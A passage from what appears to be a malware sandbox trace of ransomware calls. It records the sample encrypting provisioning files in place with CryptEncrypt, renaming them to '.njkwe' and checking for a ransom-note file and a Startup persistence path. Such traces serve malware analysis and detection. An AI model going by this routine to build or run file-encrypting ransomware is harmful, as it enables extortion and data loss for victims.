SAOC (Oman)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\313__connections_cellular_omani qatari telecommunications company saoc (oman)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.214] GetTickCount () returned 0x1153e1f [0078.214] GetTickCount () returned 0x1153e1f [0078.214] GetTickCount () returned 0x1153e1f [0078.214] GetTickCount () returned 0x1153e1f [0078.214] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.214] GetProcessHeap () returned 0xbe0000 [0078.214] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.214] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2ed, lpOverlapped=0x0) returned 1 [0078.215] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd13, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.216] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2ed, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2ed, lpOverlapped=0x0) returned 1 [0078.216] GetProcessHeap () returned 0xbe0000 [0078.216] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.216] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.216] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.216] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.216] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.216] CloseHandle (hObject=0x43c) returned 1 [0078.216] GetProcessHeap () returned 0xbe0000 [0078.216] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.216] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\313__Connections_Cellular_Omani Qatari Telecommunications Company SAOC (Oman)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 215 [0078.216] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\313__Connections_Cellular_Omani Qatari Telecommunications Company SAOC (Oman)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\313__connections_cellular_omani qatari telecommunications company saoc (oman)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\313__Connections_Cellular_Omani Qatari Telecommunications Company SAOC (Oman)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\313__connections_cellular_omani qatari telecommunications company saoc (oman)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.217] GetProcessHeap () returned 0xbe0000 [0078.217] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.217] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90bab788, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90bab788, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90bab788, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x29a, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="314__Connections_Cellular_Mobilink GSM (Pakistan)_i0$(__MVID)@WAP.provxml", cAlternateFileName="314__C~1.PRO")) returned 1 [0078.217] lstrcmpiW (lpString1="314__Connections_Cellular_Mobilink GSM (Pakistan)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.217] lstrcmpiW (lpString1="314__Connections_Cellular_Mobilink GSM (Pakistan)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.217] lstrcmpiW (lpString1="314__Connections_Cellular_Mobilink GSM (Pakistan)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.217] lstrcmpiW (lpString1="314__Connections_Cellular_Mobilink GSM (Pakistan)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.217] lstrcmpiW (lpString1="314__Connections_Cellular_Mobilink GSM (Pakistan)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.217] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\314__Connections_Cellular_Mobilink GSM (Pakistan)_i0$(__MVID)@WAP.provxml") returned 167 [0078.217] StrStrIW (lpFirst="314__Connections_Cellular_Mobilink GSM (Pakistan)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.217] lstrcmpW (lpString1="314__Connections_Cellular_Mobilink GSM (Pakistan)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.217] lstrcmpW (lpString1="314__Connections_Cellular_Mobilink GSM (Pakistan)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.217] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\314__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.217] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\314__Connections_Cellular_Mobilink GSM (Pakistan)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\314__connections_cellular_mobilink gsm (pakistan)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.218] GetTickCount () returned 0x1153e2e [0078.218] GetTickCount () returned 0x1153e2e [0078.218] GetTickCount () returned 0x1153e2e [0078.218] GetTickCount () returned 0x1153e2e [0078.218] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.218] GetProcessHeap () returned 0xbe0000 [0078.218] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.218] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x29a, lpOverlapped=0x0) returned 1 [0078.219] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd66, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.219] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x29a, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x29a, lpOverlapped=0x0) returned 1 [0078.220] GetProcessHeap () returned 0xbe0000 [0078.220] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.220] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.220] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.220] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.220] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.220] CloseHandle (hObject=0x43c) returned 1 [0078.220] GetProcessHeap () returned 0xbe0000 [0078.220] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.220] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\314__Connections_Cellular_Mobilink GSM (Pakistan)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 187 [0078.220] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\314__Connections_Cellular_Mobilink GSM (Pakistan)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\314__connections_cellular_mobilink gsm (pakistan)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\314__Connections_Cellular_Mobilink GSM (Pakistan)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\314__connections_cellular_mobilink gsm (pakistan)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.221] GetProcessHeap () returned 0xbe0000 [0078.221] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.221] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90bab788, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90bab788, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90bab788, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x28f, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="315__Connections_Cellular_Mobilink GSM (Pakistan)_i1$(__MVID)@WAP.provxml", cAlternateFileName="315__C~1.PRO")) returned 1 [0078.221] lstrcmpiW (lpString1="315__Connections_Cellular_Mobilink GSM (Pakistan)_i1$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.221] lstrcmpiW (lpString1="315__Connections_Cellular_Mobilink GSM (Pakistan)_i1$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.221] lstrcmpiW (lpString1="315__Connections_Cellular_Mobilink GSM (Pakistan)_i1$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.221] lstrcmpiW (lpString1="315__Connections_Cellular_Mobilink GSM (Pakistan)_i1$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.221] lstrcmpiW (lpString1="315__Connections_Cellular_Mobilink GSM (Pakistan)_i1$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.221] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\315__Connections_Cellular_Mobilink GSM (Pakistan)_i1$(__MVID)@WAP.provxml") returned 167 [0078.221] StrStrIW (lpFirst="315__Connections_Cellular_Mobilink GSM (Pakistan)_i1$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.221] lstrcmpW (lpString1="315__Connections_Cellular_Mobilink GSM (Pakistan)_i1$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.221] lstrcmpW (lpString1="315__Connections_Cellular_Mobilink GSM (Pakistan)_i1$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.221] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\315__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.222] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\315__Connections_Cellular_Mobilink GSM (Pakistan)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\315__connections_cellular_mobilink gsm (pakistan)_i1$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.222] GetTickCount () returned 0x1153e2e [0078.222] GetTickCount () returned 0x1153e2e [0078.222] GetTickCount () returned 0x1153e2e [0078.222] GetTickCount () returned 0x1153e2e [0078.222] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.222] GetProcessHeap () returned 0xbe0000 [0078.222] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.222] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x28f, lpOverlapped=0x0) returned 1 [0078.225] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd71, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.225] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x28f, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x28f, lpOverlapped=0x0) returned 1 [0078.226] GetProcessHeap () returned 0xbe0000 [0078.226] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.226] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.226] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.226] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.226] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.226] CloseHandle (hObject=0x43c) returned 1 [0078.226] GetProcessHeap () returned 0xbe0000 [0078.226] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.226] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\315__Connections_Cellular_Mobilink GSM (Pakistan)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 187 [0078.226] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\315__Connections_Cellular_Mobilink GSM (Pakistan)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\315__connections_cellular_mobilink gsm (pakistan)_i1$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\315__Connections_Cellular_Mobilink GSM (Pakistan)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\315__connections_cellular_mobilink gsm (pakistan)_i1$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.227] GetProcessHeap () returned 0xbe0000 [0078.227] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.227] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90bab788, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90bab788, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90bab788, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x346, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="316__Connections_Cellular_Telenor (Pakistan)_i0$(__MVID)@WAP.provxml", cAlternateFileName="316__C~1.PRO")) returned 1 [0078.227] lstrcmpiW (lpString1="316__Connections_Cellular_Telenor (Pakistan)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.227] lstrcmpiW (lpString1="316__Connections_Cellular_Telenor (Pakistan)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.227] lstrcmpiW (lpString1="316__Connections_Cellular_Telenor (Pakistan)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.227] lstrcmpiW (lpString1="316__Connections_Cellular_Telenor (Pakistan)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.227] lstrcmpiW (lpString1="316__Connections_Cellular_Telenor (Pakistan)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.227] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\316__Connections_Cellular_Telenor (Pakistan)_i0$(__MVID)@WAP.provxml") returned 162 [0078.227] StrStrIW (lpFirst="316__Connections_Cellular_Telenor (Pakistan)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.227] lstrcmpW (lpString1="316__Connections_Cellular_Telenor (Pakistan)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.227] lstrcmpW (lpString1="316__Connections_Cellular_Telenor (Pakistan)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.227] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\316__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.227] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\316__Connections_Cellular_Telenor (Pakistan)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\316__connections_cellular_telenor (pakistan)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.228] GetTickCount () returned 0x1153e2e [0078.228] GetTickCount () returned 0x1153e2e [0078.228] GetTickCount () returned 0x1153e2e [0078.228] GetTickCount () returned 0x1153e2e [0078.228] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.228] GetProcessHeap () returned 0xbe0000 [0078.228] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.228] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x346, lpOverlapped=0x0) returned 1 [0078.229] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffcba, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.229] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x346, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x346, lpOverlapped=0x0) returned 1 [0078.229] GetProcessHeap () returned 0xbe0000 [0078.229] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.229] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.229] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.230] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.230] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.230] CloseHandle (hObject=0x43c) returned 1 [0078.230] GetProcessHeap () returned 0xbe0000 [0078.230] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.230] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\316__Connections_Cellular_Telenor (Pakistan)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 182 [0078.230] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\316__Connections_Cellular_Telenor (Pakistan)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\316__connections_cellular_telenor (pakistan)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\316__Connections_Cellular_Telenor (Pakistan)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\316__connections_cellular_telenor (pakistan)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.230] GetProcessHeap () returned 0xbe0000 [0078.230] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.231] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90bd19f0, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90bd19f0, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90bd19f0, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x288, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="317__Connections_Cellular_Ufone (Pakistan)_i0$(__MVID)@WAP.provxml", cAlternateFileName="317__C~1.PRO")) returned 1 [0078.233] lstrcmpiW (lpString1="317__Connections_Cellular_Ufone (Pakistan)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.233] lstrcmpiW (lpString1="317__Connections_Cellular_Ufone (Pakistan)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.233] lstrcmpiW (lpString1="317__Connections_Cellular_Ufone 